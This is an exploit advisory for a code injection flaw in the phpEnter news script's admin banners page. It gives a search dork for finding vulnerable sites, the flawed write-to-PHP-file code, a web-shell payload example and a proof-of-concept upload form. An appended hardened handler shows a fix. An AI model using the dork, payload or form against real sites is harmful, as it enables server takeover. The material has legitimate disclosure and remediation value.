`########################################################
#
# Exploit Title : Php Enter Php Code Injection
#
# Author : IrIsT.Ir & Sec4Ever.com
#
# Discovered By : L3b-r1'z
#
# Home : http://IrIsT.Ir & http://Sec4Ever.com
#
# P Blob : http://L3b-r1z.com/
#
# Software Link : http://www.phpenter.net/
#
# Security Risk : High
#
# Version : beta
#
# Tested on : win\XP
#
# Dork : allintext: "Powered by phpEnter.net"
#
# 1) Info Script
# 2) Info Vulnerability
# 3) P0c
#
########################################################
#
# 1) Info Script:
#
# PHP Enter is a free and Open Source PHP News Publishing script.
# It is an online news publishing system that features easy installation, user submission,
# and an admin panel for adding, editing and removing categories and news.
########################################################
#
# 2) Info Vulnerability :
#
# This exploit allows an attacker to inject PHP code for execution, like system($_GET['cmd']);
# The vulnerable code is in the file named banners in the admin folder :
#
# 1. <?php
# 2. if(isset($_POST['submit']))
# 3. {
# 4. $ccode = $_POST['code'];
# 5.
# 6. $myFile="horad.php";
# 7. $fh = fopen($myFile, 'w') or die("can't open file- check CHMOD");
# 8. $stringData = "$ccode";
# 9. fwrite($fh, $stringData);
# 10. fclose($fh);
# 11. echo"<br /><center><font size=2 color=green>Successfully.</font></center>";
# 12. }else{
# 13. ?>
#
# Look at line 7: fopen() opens $myFile, which line 6 sets to "horad.php", for writing,
# or dies with "can't open file- check CHMOD".
# Line 9 calls fwrite() with $fh and $stringData. $stringData is not sanitized :),
# so an attacker can inject PHP code that gets executed.
# Look at line 4: $_POST['code']; the attacker supplies this value in a POST request
# from any developer tool, like HTTP LIVE EDITOR or HTTP Live Headers.
#
#
#########################################################
#
# 3) p0c :
#
# <form method="post" action="http://localhost/admin/banners.php">
# <center>
# <font color=#3A586A>Code</font><br />
# <textarea name="code"></textarea>
# <br /><br />
# <input type="submit" name="submit" VALUE=" Submit"><br /><br /><br /><br />
# </form>
#
#########################################################
#
# Special Thx to : Irist.ir Team & Sec4ever.com Team
#
#########################################################
#
# Greet'z : Am1r, The Injector, Sec4ever, b0x, Paulzz, Virus-Ra3ech, Damane2011
# Hacker-1420, Th3 Killer Dz, OVER-X <3, Stalk3r, The Viper, N4ss1m, B07 M4S73R
# Ked-Ans, And All Members Of Irist And Sec4ever Team
#
#########################################################
`
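A hardened form of the banners handler, as an added example that is not phpEnter code or part of the original advisory: the snippet shown checks only `isset($_POST['submit'])` and writes the posted value into a `.php` file, so this version adds a session check and CSRF token and stores the banner as data. The `is_admin` session flag, the `csrf` field, the `BANNER_FILE` path and the size limit are assumptions.

```php
<?php
// Added example, not phpEnter code. Assumptions are marked "assumed".
declare(strict_types=1);

const BANNER_FILE = __DIR__ . '/../data/banner.html'; // assumed path; never parsed as PHP
const MAX_BANNER_BYTES = 8192;                        // assumed limit

// Validate banner markup before it is stored. Returns the markup or throws.
function validate_banner(string $code): string
{
    if (strlen($code) > MAX_BANNER_BYTES) {
        throw new InvalidArgumentException('banner too large');
    }
    // Defense in depth: refuse PHP open tags even though the file is not executed.
    if (preg_match('/<\?|<script\s+language\s*=\s*["\']?php/i', $code)) {
        throw new InvalidArgumentException('PHP tags are not allowed in a banner');
    }
    return $code;
}

function save_banner(array $session, array $post): void
{
    // 1. Only a logged-in admin may write (assumed session flag set by the login page).
    if (empty($session['is_admin'])) {
        throw new RuntimeException('not authorised');
    }
    // 2. Require the per-session CSRF token issued with the form (assumed field name).
    $sent = (string)($post['csrf'] ?? '');
    if (!isset($session['csrf']) || !hash_equals((string)$session['csrf'], $sent)) {
        throw new RuntimeException('bad CSRF token');
    }
    // 3. Store validated markup as data, with an exclusive lock.
    $code = validate_banner((string)($post['code'] ?? ''));
    if (file_put_contents(BANNER_FILE, $code, LOCK_EX) === false) {
        throw new RuntimeException('cannot write banner file');
    }
}

if (PHP_SAPI !== 'cli' && ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    session_start();
    try {
        save_banner($_SESSION, $_POST);
        echo 'Saved.';
    } catch (Throwable $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
}
// Templates output the banner with readfile(BANNER_FILE), never include/require.
```

The stored markup is still admin-supplied HTML, so it is only as trustworthy as the admin account that wrote it.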